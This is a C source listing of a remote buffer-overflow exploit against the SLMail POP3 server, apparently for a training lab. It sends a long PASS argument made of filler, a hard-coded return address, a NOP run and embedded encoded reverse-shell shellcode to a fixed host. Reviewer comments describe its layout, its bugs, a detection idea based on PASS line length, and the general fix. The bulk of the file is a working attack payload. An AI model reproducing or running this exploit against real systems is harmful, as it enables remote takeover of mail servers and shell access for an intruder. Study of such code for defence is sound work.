Author: Not specified Language: c
Description: Not specified Timestamp: 2017-09-07 00:25:36 +0000
  1. #include <fcntl.h>
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <sys/socket.h>
  5. #include <sys/types.h>
  6. #include <sys/wait.h>
  7. #include <errno.h>
  8. #include <netinet/in.h>
  9. #include <netdb.h>
  10. #include <string.h>
  11.  
  /*
   * Four raw bytes that main() appends directly after the filler block.
   * NOTE(review): read as a little-endian 32-bit value these bytes are
   * 0x5f4a358f, which does not match the 0x773a459f quoted in the trailing
   * comment, so that comment looks stale. A fixed value like this presumes
   * the same address is valid on every target, which address-space
   * randomisation is designed to break.
   */
  12. #define retadd "\x8f\x35\x4a\x5f" /*win2k server sp4 0x773a459f*/
  /* TCP port used by conn(); 110 is the standard POP3 port. */
  13. #define port 110
  14.  
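  15. /* Custom reverse shell re-written by me. NOTE(review): the array below is opaque, encoded machine code; what it does, including any address it connects back to, cannot be confirmed from this listing. */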
  16. unsigned char shellcode[] =
  17. "\xdb\xd3\xbb\x37\x39\xd3\x94\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
  18. "\x52\x31\x5f\x17\x03\x5f\x17\x83\xf0\x3d\x31\x61\x02\xd5\x37"
  19. "\x8a\xfa\x26\x58\x02\x1f\x17\x58\x70\x54\x08\x68\xf2\x38\xa5"
  20. "\x03\x56\xa8\x3e\x61\x7f\xdf\xf7\xcc\x59\xee\x08\x7c\x99\x71"
  21. "\x8b\x7f\xce\x51\xb2\x4f\x03\x90\xf3\xb2\xee\xc0\xac\xb9\x5d"
  22. "\xf4\xd9\xf4\x5d\x7f\x91\x19\xe6\x9c\x62\x1b\xc7\x33\xf8\x42"
  23. "\xc7\xb2\x2d\xff\x4e\xac\x32\x3a\x18\x47\x80\xb0\x9b\x81\xd8"
  24. "\x39\x37\xec\xd4\xcb\x49\x29\xd2\x33\x3c\x43\x20\xc9\x47\x90"
  25. "\x5a\x15\xcd\x02\xfc\xde\x75\xee\xfc\x33\xe3\x65\xf2\xf8\x67"
  26. "\x21\x17\xfe\xa4\x5a\x23\x8b\x4a\x8c\xa5\xcf\x68\x08\xed\x94"
  27. "\x11\x09\x4b\x7a\x2d\x49\x34\x23\x8b\x02\xd9\x30\xa6\x49\xb6"
  28. "\xf5\x8b\x71\x46\x92\x9c\x02\x74\x3d\x37\x8c\x34\xb6\x91\x4b"
  29. "\x3a\xed\x66\xc3\xc5\x0e\x97\xca\x01\x5a\xc7\x64\xa3\xe3\x8c"
  30. "\x74\x4c\x36\x02\x24\xe2\xe9\xe3\x94\x42\x5a\x8c\xfe\x4c\x85"
  31. "\xac\x01\x87\xae\x47\xf8\x40\xdb\x9c\x02\xe5\xb3\xa0\x02\x04"
  32. "\xff\x2c\xe4\x6c\xef\x78\xbf\x18\x96\x20\x4b\xb8\x57\xff\x36"
  33. "\xfa\xdc\x0c\xc7\xb5\x14\x78\xdb\x22\xd5\x37\x81\xe5\xea\xed"
  34. "\xad\x6a\x78\x6a\x2d\xe4\x61\x25\x7a\xa1\x54\x3c\xee\x5f\xce"
  35. "\x96\x0c\xa2\x96\xd1\x94\x79\x6b\xdf\x15\x0f\xd7\xfb\x05\xc9"
  36. "\xd8\x47\x71\x85\x8e\x11\x2f\x63\x79\xd0\x99\x3d\xd6\xba\x4d"
  37. "\xbb\x14\x7d\x0b\xc4\x70\x0b\xf3\x75\x2d\x4a\x0c\xb9\xb9\x5a"
  38. "\x75\xa7\x59\xa4\xac\x63\x79\x47\x64\x9e\x12\xde\xed\x23\x7f"
  39. "\xe1\xd8\x60\x86\x62\xe8\x18\x7d\x7a\x99\x1d\x39\x3c\x72\x6c"
  40. "\x52\xa9\x74\xc3\x53\xf8";
  41. //351 bytes
  42. //windows/shell/reverse_tcp
  43.  
  44.  
  /* File-scope socket addresses. Only plm is referenced (by conn()) in this listing; lar and target are declared but never used here. */
  45. struct sockaddr_in plm,lar,target;
  46.  
  /*
   * Open a TCP connection to the dotted-quad address `ip` on the compile-time
   * `port` and return the connected socket descriptor. Fills the file-scope
   * `plm` address structure as a side effect.
   *
   * If connect() fails the function prints the error with perror() and ends
   * the process with exit(0), so the caller never sees a failure return.
   *
   * NOTE(review): the socket() result is not checked before it is passed to
   * connect(), and the failure path exits with status 0, which a calling
   * script would read as success. inet_addr() and bzero() are used although
   * <arpa/inet.h> and <strings.h> are not among the includes shown.
   */
  47. int conn(char *ip)
  48. {
  49.  int sockfd;
       /* IPv4 destination: port in network byte order, address parsed from text. */
  50.  plm.sin_family = AF_INET;
  51.  plm.sin_port = htons(port);
  52.  plm.sin_addr.s_addr = inet_addr(ip);
       /* Clear the 8 padding bytes of sockaddr_in. */
  53.  bzero(&(plm.sin_zero),8);
  54.  sockfd = socket(AF_INET,SOCK_STREAM,0);
  55. if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0)
  56. {
  57.  perror("[-] connect error!");
       /* Terminates the whole program; exit status is 0 even though this is an error. */
  58.  exit(0);
  59. }
  60.  printf("[*] Connected to: %s.\n",ip);
  61.  return sockfd;
  62. }
  63.  
  /*
   * Entry point. Assembles one long string and sends it as the argument of a
   * POP3 PASS command to a hard-coded host; argc and argv are not used. The
   * banner printed below describes this as a buffer overflow in SLMail's
   * handling of PASS.
   *
   * String layout, in strcat() order: 2606 bytes of 0x41 filler, the 4 bytes
   * of `retadd`, 8 bytes of 0x90, then the `shellcode` array.
   *
   * On the wire this is "USER username\r\n" followed by "PASS " and a
   * multi-kilobyte argument. A PASS line of that size on port 110 is far
   * longer than a real password, which makes line length a practical thing
   * to alert on. NOTE(review): the server code is not shown here, so the
   * flaw itself is known only from the banner text; the general remedy for
   * this class of bug is a length-checked copy of the PASS argument.
   *
   * NOTE(review): as written the program has undefined behaviour of its own.
   * `off` and `nop` are never NUL-terminated before strcat(), nothing checks
   * the combined length against the 2965-byte `buffer`, and no malloc(),
   * read() or write() result is checked.
   */
  64. int main(int argc, char *argv[])
  65. {
  66.     int xs;
  67.     char out[1024];
           /* Destination for the assembled PASS argument, zero-filled so strcat() starts from an empty string. */
  68.     char *buffer = malloc(2965);
  69.     memset(buffer, 0x00, 2965);
  70.     char *off = malloc(2606);/*This is where the offset lives*/
           /* Every byte of off is set to 'A' (0x41); no terminator is stored. */
  71.     memset(off, 0x41, 2606);
  72.     //memset(off, 0x41, 2605);
  73.     //char *nop = malloc(16);
  74.     //memset(nop, 0x00, 13);
  75.     //memset(nop, 0x90, 16);
  76.  
           /* The zero fill is immediately overwritten: all 8 bytes end up 0x90, again with no terminator. */
  77.     char *nop = malloc(8);
  78.     memset(nop, 0x00, 8);
  79.     memset(nop, 0x90, 8);
  80.  
           /* Concatenate the four pieces in order: filler, retadd, 0x90 run, shellcode. */
  81.     strcat(buffer, off);
  82.     strcat(buffer, retadd);
  83.     strcat(buffer, nop);
  84.     strcat(buffer, shellcode);
  85.  
  86.     printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\n");
           /* The destination address is fixed in the source rather than taken from argv. */
  87.     xs = conn("10.11.12.104");
           /* Read and echo the server's first reply. NOTE(review): out is not NUL-terminated after read(), yet it is printed with %s. */
  88.     read(xs, out, 1024);
  89.     printf("[*] %s", out);
  90.     write(xs,"USER username\r\n", 15);
  91.     read(xs, out, 1024);
  92.     printf("[*] %s", out);
           /* The PASS verb and the oversized argument go out as two separate writes. */
  93.     write(xs,"PASS ",5);
  94.     write(xs,buffer,strlen(buffer));
           /* NOTE(review): strlen() returns size_t but is printed with %d. */
  95.     printf("Shellcode len: %d bytes\n",strlen(shellcode));
  96.     printf("Buffer len: %d bytes\n",strlen(buffer));
           /* NOTE(review): length 4 is larger than the 3-byte "\r\n" literal (two characters plus the terminator). */
  97.     write(xs,"\r\n",4);
           /* The socket is closed without reading a reply to PASS. */
  98.     close(xs);  
  99. }